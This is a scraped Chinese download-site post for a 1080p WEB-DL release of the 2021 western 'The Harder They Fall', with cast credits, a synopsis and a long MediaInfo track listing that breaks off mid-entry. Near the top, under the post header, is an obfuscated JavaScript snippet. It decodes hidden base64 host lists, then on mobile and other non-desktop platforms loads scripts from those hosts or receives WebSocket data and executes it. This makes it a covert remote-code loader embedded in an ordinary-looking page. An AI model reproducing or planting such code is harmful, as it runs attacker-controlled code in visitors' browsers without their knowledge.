复仇之渊[中文字幕].The.Harder.They.Fall.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264 19.22GB

版主小s 28天前 287

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 复仇之渊 / 野心难拒

◎片 名 The Harder They Fall

◎年 代 2021

◎产 地 美国

◎类 别 剧情 / 西部

◎语 言 英语

◎上映日期 2021-11-03(美国)

◎IMDb链接 https://www.imdb.com/title/tt10696784/

◎豆瓣链接 https://movie.douban.com/subject/34894021/

◎片 长 130分钟

◎导 演 杰姆斯·塞缪尔 Jeymes Samuel (id:1454946)

◎编 剧 杰姆斯·塞缪尔 Jeymes Samuel (id:1454946)

鲍兹·亚金 Boaz Yakin (id:1301377)

◎演 员 乔纳森·梅杰斯 Jonathan Majors (id:1362669)

雷吉娜·金 Regina King (id:1013843)

伊德里斯·艾尔巴 Idris Elba (id:1049501)

艾迪·盖瑟吉 Edi Gathegi (id:1031923)

莎姬·贝兹 Zazie Beetz (id:1370059)

勒凯斯·斯坦菲尔德 Lakeith Stanfield (id:1272798)

德尔罗伊·林多 Delroy Lindo (id:1040621)

泰特·弗莱彻 Tait Fletcher (id:1389967)

RJ·赛勒 RJ Cyler (id:1350258)

Ntare Guma Mbaho Mwine Ntare Guma Mbaho Mwine (id:1453935)

胡里奥·赛迪罗 Julio Cedillo (id:1332387)

小霍华德·弗格森 Howard Ferguson Jr. (id:1456898)

丹妮尔·戴德怀勒 Danielle Deadwyler (id:1452746)

迪兰·科宁 Dylan Kenin (id:1328497)

马克·史密斯 Mark Rhino Smith (id:1175204)

尼古拉斯·G·西姆斯 Nicholas G. Sims (id:1434067)

米奇·多兰 Mickey Dolan (id:1425659)

J·内森·西蒙斯 J. Nathan Simmons (id:1141234)

Torrey B. Lawrence (id:1270485)

斯蒂芬妮·希尔 Stephanie Hill (id:1409741)

曼尼·鲁比奥 Manny Rubio (id:1231178)

拉兹·阿隆索 Laz Alonso (id:1277094)

穆斯塔法·沙基尔 Mustafa Shakir (id:1362426)

杰姆斯·塞缪尔 Jeymes Samuel (id:1454946)

◎标 签 西部 / 美国 / 2021 / Netflix / 美国电影 / 剧情 / 动作 / 伊德里斯·艾尔巴

◎简 介

不法之徒纳特·洛夫(乔纳森·梅杰斯饰)发现他的敌人鲁弗斯·巴克(伊德里斯·艾尔巴饰)从监狱里被放了出来,于是他召集自己的团伙向鲁弗斯展开了复仇行动。在这部别出心裁的西部片中,与纳特同行的还有他的前女友斯特奇科奇·马里(莎姬·贝兹饰),他的左膀右臂、脾气火爆的比尔·皮克特(艾迪·盖瑟吉饰),快枪手吉姆·贝克沃思(RJ·赛勒饰),以及一位从对立阵营转来的、意想不到的盟友。鲁弗斯·巴克也有一支令人闻风丧胆的团队,成员包括“叛逆者”特鲁迪·史密斯(雷吉娜·金饰)和切罗基·比尔(勒凯斯·斯坦菲尔德饰),他们绝不会束手就擒。杰姆斯·塞缪尔担任导演,塞缪尔和鲍兹·亚金担任编剧,肖恩·卡特、詹姆斯·拉西特、劳伦斯·班德、杰姆斯·塞缪尔共同担任制片人,并配有充满激情的配乐以及令人惊叹的全明星阵容,包括乔纳森·梅杰斯、莎姬·贝兹、德尔罗伊·林多、勒凯斯·斯坦菲尔德、丹妮...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 332264542265759023342588183377346864926 (0xF9F7D2B95A91E71F817A8B0AF484A71E)

  4. Complete name : Th[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 19.2 GiB

  8. Duration : 2 h 19 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 19.8 Mb/s

  11. Encoded date : UTC 2021-11-03 07:35:08

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 19 min

  24. Bit rate mode : Variable

  25. Bit rate : 7 233 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.145

  37. Stream size : 7.02 GiB (37%)

  38. Writing library : x264 core 148 r2724 dbe0335

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 2 h 19 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 764 MiB (4%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 2 h 19 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 637 MiB (3%)

  81. Title : Arabic Syria

  82. Language : Arabic

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 2 h 19 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 637 MiB (3%)

  101. Title : Czech

  102. Language : Czech

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3 JOC

  109. Format/Info : Enhanced AC-3 with Joint Object Coding

  110. Commercial name : Dolby Digital Plus with Dolby Atmos

  111. Codec ID : A_EAC3

  112. Duration : 2 h 19 min

  113. Bit rate mode : Constant

  114. Bit rate : 768 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 764 MiB (4%)

  121. Title : French

  122. Language : French

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No

  126. Complexity index : 16

  127. Number of dynamic objects : 15

  128. Bed channel count : 1 channel

  129. Bed channel configuration : LFE


  130. Audio #5

  131. ID : 6

  132. Format : E-AC-3 JOC

  133. Format/Info : Enhanced AC-3 with Joint Object Coding

  134. Commercial name : Dolby Digital Plus with Dolby Atmos

  135. Codec ID : A_EAC3

  136. Duration : 2 h 19 min

  137. Bit rate mode : Constant

  138. Bit rate : 768 kb/s

  139. Channel(s) : 6 channels

  140. Channel layout : L R C LFE Ls Rs

  141. Sampling rate : 48.0 kHz

  142. Frame rate : 31.250 FPS (1536 SPF)

  143. Compression mode : Lossy

  144. Stream size : 764 MiB (4%)

  145. Title : German

  146. Language : German

  147. Service kind : Complete Main

  148. Default : No

  149. Forced : No

  150. Complexity index : 16

  151. Number of dynamic objects : 15

  152. Bed channel count : 1 channel

  153. Bed channel configuration : LFE


  154. Audio #6

  155. ID : 7

  156. Format : E-AC-3

  157. Format/Info : Enhanced AC-3

  158. Commercial name : Dolby Digital Plus

  159. Codec ID : A_EAC3

  160. Duration : 2 h 19 min

  161. Bit rate mode : Constant

  162. Bit rate : 640 kb/s

  163. Channel(s) : 6 channels

  164. Channel layout : L R C LFE Ls Rs

  165. Sampling rate : 48.0 kHz

  166. Frame rate : 31.250 FPS (1536 SPF)

  167. Compression mode : Lossy

  168. Stream size : 637 MiB (3%)

  169. Title : Hindi

  170. Language : Hindi

  171. Service kind : Complete Main

  172. Default : No

  173. Forced : No


  174. Audio #7

  175. ID : 8

  176. Format : E-AC-3

  177. Format/Info : Enhanced AC-3

  178. Commercial name : Dolby Digital Plus

  179. Codec ID : A_EAC3

  180. Duration : 2 h 19 min

  181. Bit rate mode : Constant

  182. Bit rate : 640 kb/s

  183. Channel(s) : 6 channels

  184. Channel layout : L R C LFE Ls Rs

  185. Sampling rate : 48.0 kHz

  186. Frame rate : 31.250 FPS (1536 SPF)

  187. Compression mode : Lossy

  188. Stream size : 637 MiB (3%)

  189. Title : Hungarian

  190. Language : Hungarian

  191. Service kind : Complete Main

  192. Default : No

  193. Forced : No


  194. Audio #8

  195. ID : 9

  196. Format : E-AC-3 JOC

  197. Format/Info : Enhanced AC-3 with Joint Object Coding

  198. Commercial name : Dolby Digital Plus with Dolby Atmos

  199. Codec ID : A_EAC3

  200. Duration : 2 h 19 min

  201. Bit rate mode : Constant

  202. Bit rate : 768 kb/s

  203. Channel(s) : 6 channels

  204. Channel layout : L R C LFE Ls Rs

  205. Sampling rate : 48.0 kHz

  206. Frame rate : 31.250 FPS (1536 SPF)

  207. Compression mode : Lossy

  208. Stream size : 764 MiB (4%)

  209. Title : Italian

  210. Language : Italian

  211. Service kind : Complete Main

  212. Default : No

  213. Forced : No

  214. Complexity index : 16

  215. Number of dynamic objects : 15

  216. Bed channel count : 1 channel

  217. Bed channel configuration : LFE


  218. Audio #9

  219. ID : 10

  220. Format : E-AC-3 JOC

  221. Format/Info : Enhanced AC-3 with Joint Object Coding

  222. Commercial name : Dolby Digital Plus with Dolby Atmos

  223. Codec ID : A_EAC3

  224. Duration : 2 h 19 min

  225. Bit rate mode : Constant

  226. Bit rate : 768 kb/s

  227. Channel(s) : 6 channels

  228. Channel layout : L R C LFE Ls Rs

  229. Sampling rate : 48.0 kHz

  230. Frame rate : 31.250 FPS (1536 SPF)

  231. Compression mode : Lossy

  232. Stream size : 764 MiB (4%)

  233. Title : Japanese

  234. Language : Japanese

  235. Service kind : Complete Main

  236. Default : No

  237. Forced : No

  238. Complexity index : 16

  239. Number of dynamic objects : 15

  240. Bed channel count : 1 channel

  241. Bed channel configuration : LFE


  242. Audio #10

  243. ID : 11

  244. Format : E-AC-3

  245. Format/Info : Enhanced AC-3

  246. Commercial name : Dolby Digital Plus

  247. Codec ID : A_EAC3

  248. Duration : 2 h 19 min

  249. Bit rate mode : Constant

  250. Bit rate : 640 kb/s

  251. Channel(s) : 6 channels

  252. Channel layout : L R C LFE Ls Rs

  253. Sampling rate : 48.0 kHz

  254. Frame rate : 31.250 FPS (1536 SPF)

  255. Compression mode : Lossy

  256. Stream size : 637 MiB (3%)

  257. Title : Polish

  258. Language : Polish

  259. Service kind : Complete Main

  260. Default : No

  261. Forced : No


  262. Audio #11

  263. ID : 12

  264. Format : E-AC-3 JOC

  265. Format/Info : Enhanced AC-3 with Joint Object Coding

  266. Commercial name : Dolby Digital Plus with Dolby Atmos

  267. Codec ID : A_EAC3

  268. Duration : 2 h 19 min

  269. Bit rate mode : Constant

  270. Bit rate : 768 kb/s

  271. Channel(s) : 6 channels

  272. Channel layout : L R C LFE Ls Rs

  273. Sampling rate : 48.0 kHz

  274. Frame rate : 31.250 FPS (1536 SPF)

  275. Compression mode : Lossy

  276. Stream size : 764 MiB (4%)

  277. Title : Brazilian Portuguese

  278. Language : Portuguese

  279. Service kind : Complete Main

  280. Default : No

  281. Forced : No

  282. Complexity index : 16

  283. Number of dynamic objects : 15

  284. Bed channel count : 1 channel

  285. Bed channel configuration : LFE


  286. Audio #12

  287. ID : 13

  288. Format : E-AC-3

  289. Format/Info : Enhanced AC-3

  290. Commercial name : Dolby Digital Plus

  291. Codec ID : A_EAC3

  292. Duration : 2 h 19 min

  293. Bit rate mode : Constant

  294. Bit rate : 640 kb/s

  295. Channel(s) : 6 channels

  296. Channel layout : L R C LFE Ls Rs

  297. Sampling rate : 48.0 kHz

  298. Frame rate : 31.250 FPS (1536 SPF)

  299. Compression mode : Lossy

  300. Stream size : 637 MiB (3%)

  301. Title : Russian

  302. Language : Russian

  303. Service kind : Complete Main

  304. Default : No

  305. Forced : No


  306. Audio #13

  307. ID : 14

  308. Format : E-AC-3 JOC

  309. Format/Info : Enhanced AC-3 with Joint Object Coding

  310. Commercial name : Dolby Digital Plus with Dolby Atmos

  311. Codec ID : A_EAC3

  312. Duration : 2 h 19 min

  313. Bit rate mode : Constant

  314. Bit rate : 768 kb/s

  315. Channel(s) : 6 channels

  316. Channel layout : L R C LFE Ls Rs

  317. Sampling rate : 48.0 kHz

  318. Frame rate : 31.250 FPS (1536 SPF)

  319. Compression mode : Lossy

  320. Stream size : 764 MiB (4%)

  321. Title : Spanish

  322. Language : Spanish

  323. Service kind : Complete Main

  324. Default : No

  325. Forced : No

  326. Complexity index : 16

  327. Number of dynamic objects : 15

  328. Bed channel count : 1 channel

  329. Bed channel configuration : LFE


  330. Audio #14

  331. ID : 15

  332. Format : E-AC-3 JOC

  333. Format/Info : Enhanced AC-3 with Joint Object Coding

  334. Commercial name : Dolby Digital Plus with Dolby Atmos

  335. Codec ID : A_EAC3

  336. Duration : 2 h 19 min

  337. Bit rate mode : Constant

  338. Bit rate : 768 kb/s

  339. Channel(s) : 6 channels

  340. Channel layout : L R C LFE Ls Rs

  341. Sampling rate : 48.0 kHz

  342. Frame rate : 31.250 FPS (1536 SPF)

  343. Compression mode : Lossy

  344. Stream size : 764 MiB (4%)

  345. Title : European Spanish

  346. Language : Spanish

  347. Service kind : Complete Main

  348. Default : No

  349. Forced : No

  350. Complexity index : 16

  351. Number of dynamic objects : 15

  352. Bed channel count : 1 channel

  353. Bed channel configuration : LFE


  354. Audio #15

  355. ID : 16

  356. Format : E-AC-3

  357. Format/Info : Enhanced AC-3

  358. Commercial name : Dolby Digital Plus

  359. Codec ID : A_EAC3

  360. Duration : 2 h 19 min

  361. Bit rate mode : Constant

  362. Bit rate : 640 kb/s

  363. Channel(s) : 6 channels

  364. Channel layout : L R C LFE Ls Rs

  365. Sampling rate : 48.0 kHz

  366. Frame rate : 31.250 FPS (1536 SPF)

  367. Compression mode : Lossy

  368. Stream size : 637 MiB (3%)

  369. Title : Swedish

  370. Language : Swedish

  371. Service kind : Complete Main

  372. Default : No

  373. Forced : No


  374. Audio #16

  375. ID : 17

  376. Format : E-AC-3

  377. Format/Info : Enhanced AC-3

  378. Commercial name : Dolby Digital Plus

  379. Codec ID : A_EAC3

  380. Duration : 2 h 19 min

  381. Bit rate mode : Constant

  382. Bit rate : 640 kb/s

  383. Channel(s) : 6 channels

  384. Channel layout : L R C LFE Ls Rs

  385. Sampling rate : 48.0 kHz

  386. Frame rate : 31.250 FPS (1536 SPF)

  387. Compression mode : Lossy

  388. Stream size : 637 MiB (3%)

  389. Title : Thai

  390. Language : Thai

  391. Service kind : Complete Main

  392. Default : No

  393. Forced : No


  394. Audio #17

  395. ID : 18

  396. Format : E-AC-3

  397. Format/Info : Enhanced AC-3

  398. Commercial name : Dolby Digital Plus

  399. Codec ID : A_EAC3

  400. Duration : 2 h 19 min

  401. Bit rate mode : Constant

  402. Bit rate : 640 kb/s

  403. Channel(s) : 6 channels

  404. Channel layout : L R C LFE Ls Rs

  405. Sampling rate : 48.0 kHz

  406. Frame rate : 31.250 FPS (1536 SPF)

  407. Compression mode : Lossy

  408. Stream size : 637 MiB (3%)

  409. Title : Turkish

  410. Language : Turkish

  411. Service kind : Complete Main

  412. Default : No

  413. Forced : No


  414. Audio #18

  415. ID : 19

  416. Format : E-AC-3

  417. Format/Info : Enhanced AC-3

  418. Commercial name : Dolby Digital Plus

  419. Codec ID : A_EAC3

  420. Duration : 2 h 19 min

  421. Bit rate mode : Constant

  422. Bit rate : 640 kb/s

  423. Channel(s) : 6 channels

  424. Channel layout : L R C LFE Ls Rs

  425. Sampling rate : 48.0 kHz

  426. Frame rate : 31.250 FPS (1536 SPF)

  427. Compression mode : Lossy

  428. Stream size : 637 MiB (3%)

  429. Title : Ukrainian

  430. Language : Ukrainian

  431. Service kind : Complete Main

  432. Default : No

  433. Forced : No


  434. Text #1

  435. ID : 20

  436. Format : UTF-8

  437. Codec ID : S_TEXT/UTF8

  438. Codec ID/Info : UTF-8 Plain Text

  439. Duration : 2 h 16 min

  440. Bit rate : 72 b/s

  441. Count of elements : 1828

  442. Stream size : 72.5 KiB (0%)

  443. Title : English

  444. Language : English

  445. Default : Yes

  446. Forced : No


  447. Text #2

  448. ID : 21

  449. Format : UTF-8

  450. Codec ID : S_TEXT/UTF8

  451. Codec ID/Info : UTF-8 Plain Text

  452. Duration : 1 h 49 min

  453. Bit rate : 0 b/s

  454. Count of elements : 5

  455. Stream size : 174 Bytes (0%)

  456. Title : English (Forced)

  457. Language : English

  458. Default : No

  459. Forced : Yes


  460. Text #3

  461. ID : 22

  462. Format : UTF-8

  463. Codec ID : S_TEXT/UTF8

  464. Codec ID/Info : UTF-8 Plain Text

  465. Duration : 2 h 16 min

  466. Bit rate : 60 b/s

  467. Count of elements : 1168

  468. Stream size : 60.3 KiB (0%)

  469. Title : Arabic

  470. Language : Arabic

  471. Default : No

  472. Forced : No


  473. Text #4

  474. ID : 23

  475. Format : UTF-8

  476. Codec ID : S_TEXT/UTF8

  477. Codec ID/Info : UTF-8 Plain Text

  478. Duration : 2 h 16 min

  479. Bit rate : 36 b/s

  480. Count of elements : 1146

  481. Stream size : 36.9 KiB (0%)

  482. Title : Chinese Simplified

  483. Language : Chinese

  484. Default : No

  485. Forced : No


  486. Text #5

  487. ID : 24

  488. Format : UTF-8

  489. Codec ID : S_TEXT/UTF8

  490. Codec ID/Info : UTF-8 Plain Text

  491. Duration : 2 h 16 min

  492. Bit rate : 33 b/s

  493. Count of elements : 1156

  494. Stream size : 33.4 KiB (0%)

  495. Title : Chinese Traditional

  496. Language : Chinese

  497. Default : No

  498. Forced : No


  499. Text #6

  500. ID : 25

  501. Format : UTF-8

  502. Codec ID : S_TEXT/UTF8

  503. Codec ID/Info : UTF-8 Plain Text

  504. Duration : 2 h 16 min

  505. Bit rate : 31 b/s

  506. Count of elements : 1101

  507. Stream size : 31.3 KiB (0%)

  508. Title : Croatian

  509. Language : Croatian

  510. Default : No

  511. Forced : No


  512. Text #7

  513. ID : 26

  514. Format : UTF-8

  515. Codec ID : S_TEXT/UTF8

  516. Codec ID/Info : UTF-8 Plain Text

  517. Duration : 2 h 16 min

  518. Bit rate : 31 b/s

  519. Count of elements : 1126

  520. Stream size : 31.6 KiB (0%)

  521. Title : Czech

  522. Language : Czech

  523. Default : No

  524. Forced : No


  525. Text #8

  526. ID : 27

  527. Format : UTF-8

  528. Codec ID : S_TEXT/UTF8

  529. Codec ID/Info : UTF-8 Plain Text

  530. Duration : 2 h 16 min

  531. Bit rate : 33 b/s

  532. Count of elements : 1071

  533. Stream size : 33.1 KiB (0%)

  534. Title : Danish

  535. Language : Danish

  536. Default : No

  537. Forced : No


  538. Text #9

  539. ID : 28

  540. Format : UTF-8

  541. Codec ID : S_TEXT/UTF8

  542. Codec ID/Info : UTF-8 Plain Text

  543. Duration : 2 h 16 min

  544. Bit rate : 30 b/s

  545. Count of elements : 1052

  546. Stream size : 30.9 KiB (0%)

  547. Title : Dutch

  548. Language : Dutch

  549. Default : No

  550. Forced : No


  551. Text #10

  552. ID : 29

  553. Format : UTF-8

  554. Codec ID : S_TEXT/UTF8

  555. Codec ID/Info : UTF-8 Plain Text

  556. Duration : 2 h 16 min

  557. Bit rate : 29 b/s

  558. Count of elements : 1063

  559. Stream size : 29.7 KiB (0%)

  560. Title : Finnish

  561. Language : Finnish

  562. Default : No

  563. Forced : No


  564. Text #11

  565. ID : 30

  566. Format : UTF-8

  567. Codec ID : S_TEXT/UTF8

  568. Codec ID/Info : UTF-8 Plain Text

  569. Duration : 2 h 16 min

  570. Bit rate : 34 b/s

  571. Count of elements : 1139

  572. Stream size : 34.9 KiB (0%)

  573. Title : French

  574. Language : French

  575. Default : No

  576. Forced : No


  577. Text #12

  578. ID : 31

  579. Format : UTF-8

  580. Codec ID : S_TEXT/UTF8

  581. Codec ID/Info : UTF-8 Plain Text

  582. Duration : 2 h 16 min

  583. Bit rate : 31 b/s

  584. Count of elements : 1122

  585. Stream size : 31.7 KiB (0%)

  586. Title : German

  587. Language : German

  588. Default : No

  589. Forced : No


  590. Text #13

  591. ID : 32

  592. Format : UTF-8

  593. Codec ID : S_TEXT/UTF8

  594. Codec ID/Info : UTF-8 Plain Text

  595. Duration : 2 h 16 min

  596. Bit rate : 60 b/s

  597. Count of elements : 1142

  598. Stream size : 60.8 KiB (0%)

  599. Title : Greek

  600. Language : Greek

  601. Default : No

  602. Forced : No


  603. Text #14

  604. ID : 33

  605. Format : UTF-8

  606. Codec ID : S_TEXT/UTF8

  607. Codec ID/Info : UTF-8 Plain Text

  608. Duration : 2 h 16 min

  609. Bit rate : 55 b/s

  610. Count of elements : 1131

  611. Stream size : 55.2 KiB (0%)

  612. Title : Hebrew

  613. Language : Hebrew

  614. Default : No

  615. Forced : No


  616. Text #15

  617. ID : 34

  618. Format : UTF-8

  619. Codec ID : S_TEXT/UTF8

  620. Codec ID/Info : UTF-8 Plain Text

  621. Duration : 2 h 16 min

  622. Bit rate : 33 b/s

  623. Count of elements : 1122

  624. Stream size : 33.8 KiB (0%)

  625. Title : Hungarian

  626. Language : Hungarian

  627. Default : No

  628. Forced : No


  629. Text #16

  630. ID : 35

  631. Format : UTF-8

  632. Codec ID : S_TEXT/UTF8

  633. Codec ID/Info : UTF-8 Plain Text

  634. Duration : 2 h 16 min

  635. Bit rate : 33 b/s

  636. Count of elements : 1140

  637. Stream size : 33.5 KiB (0%)

  638. Title : Indonesian

  639. Language : Indonesian

  640. Default : No

  641. Forced : No


  642. Text #17

  643. ID : 36

  644. Format : UTF-8

  645. Codec ID : S_TEXT/UTF8

  646. Codec ID/Info : UTF-8 Plain Text

  647. Duration : 2 h 16 min

  648. Bit rate : 33 b/s

  649. Count of elements : 1127

  650. Stream size : 33.0 KiB (0%)

  651. Title : Italian

  652. Language : Italian

  653. Default : No

  654. Forced : No


  655. Text #18

  656. ID : 37

  657. Format : UTF-8

  658. Codec ID : S_TEXT/UTF8

  659. Codec ID/Info : UTF-8 Plain Text

  660. Duration : 2 h 16 min

  661. Bit rate : 32 b/s

  662. Count of elements : 1157

  663. Stream size : 32.8 KiB (0%)

  664. Title : Japanese

  665. Language : Japanese

  666. Default : No

  667. Forced : No


  668. Text #19

  669. ID : 38

  670. Format : UTF-8

  671. Codec ID : S_TEXT/UTF8

  672. Codec ID/Info : UTF-8 Plain Text

  673. Duration : 2 h 16 min

  674. Bit rate : 38 b/s

  675. Count of elements : 1152

  676. Stream size : 38.8 KiB (0%)

  677. Title : Korean

  678. Language : Korean

  679. Default : No

  680. Forced : No


  681. Text #20

  682. ID : 39

  683. Format : UTF-8

  684. Codec ID : S_TEXT/UTF8

  685. Codec ID/Info : UTF-8 Plain Text

  686. Duration : 2 h 16 min

  687. Bit rate : 32 b/s

  688. Count of elements : 1128

  689. Stream size : 32.6 KiB (0%)

  690. Title : Malay

  691. Language : Malay

  692. Default : No

  693. Forced : No


  694. Text #21

  695. ID : 40

  696. Format : UTF-8

  697. Codec ID : S_TEXT/UTF8

  698. Codec ID/Info : UTF-8 Plain Text

  699. Duration : 2 h 16 min

  700. Bit rate : 32 b/s

  701. Count of elements : 1071

  702. Stream size : 32.4 KiB (0%)

  703. Title : Norwegian Bokmal

  704. Language : Norwegian Bokmal

  705. Default : No

  706. Forced : No


  707. Text #22

  708. ID : 41

  709. Format : UTF-8

  710. Codec ID : S_TEXT/UTF8

  711. Codec ID/Info : UTF-8 Plain Text

  712. Duration : 2 h 16 min

  713. Bit rate : 32 b/s

  714. Count of elements : 1121

  715. Stream size : 32.3 KiB (0%)

  716. Title : Polish

  717. Language : Polish

  718. Default : No

  719. Forced : No


  720. Text #23

  721. ID : 42

  722. Format : UTF-8

  723. Codec ID : S_TEXT/UTF8

  724. Codec ID/Info : UTF-8 Plain Text

  725. Duration : 2 h 16 min

  726. Bit rate : 33 b/s

  727. Count of elements : 1126

  728. Stream size : 33.9 KiB (0%)

  729. Title : Portuguese

  730. Language : Portuguese

  731. Default : No

  732. Forced : No


  733. Text #24

  734. ID : 43

  735. Format : UTF-8

  736. Codec ID : S_TEXT/UTF8

  737. Codec ID/Info : UTF-8 Plain Text

  738. Duration : 2 h 16 min

  739. Bit rate : 31 b/s

  740. Count of elements : 1140

  741. Stream size : 32.0 KiB (0%)

  742. Title : Brazilian Portuguese

  743. Language : Portuguese

  744. Default : No

  745. Forced : No


  746. Text #25

  747. ID : 44

  748. Format : UTF-8

  749. Codec ID : S_TEXT/UTF8

  750. Codec ID/Info : UTF-8 Plain Text

  751. Duration : 2 h 16 min

  752. Bit rate : 37 b/s

  753. Count of elements : 1126

  754. Stream size : 37.9 KiB (0%)

  755. Title : Romanian

  756. Language : Romanian

  757. Default : No

  758. Forced : No


  759. Text #26

  760. ID : 45

  761. Format : UTF-8

  762. Codec ID : S_TEXT/UTF8

  763. Codec ID/Info : UTF-8 Plain Text

  764. Duration : 2 h 16 min

  765. Bit rate : 54 b/s

  766. Count of elements : 1147

  767. Stream size : 54.9 KiB (0%)

  768. Title : Russian

  769. Language : Russian

  770. Default : No

  771. Forced : No


  772. Text #27

  773. ID : 46

  774. Format : UTF-8

  775. Codec ID : S_TEXT/UTF8

  776. Codec ID/Info : UTF-8 Plain Text

  777. Duration : 2 h 16 min

  778. Bit rate : 32 b/s

  779. Count of elements : 1168

  780. Stream size : 32.6 KiB (0%)

  781. Title : Spanish

  782. Language : Spanish

  783. Default : No

  784. Forced : No


  785. Text #28

  786. ID : 47

  787. Format : UTF-8

  788. Codec ID : S_TEXT/UTF8

  789. Codec ID/Info : UTF-8 Plain Text

  790. Duration : 2 h 16 min

  791. Bit rate : 33 b/s

  792. Count of elements : 1141

  793. Stream size : 33.7 KiB (0%)

  794. Title : European Spanish

  795. Language : Spanish

  796. Default : No

  797. Forced : No


  798. Text #29

  799. ID : 48

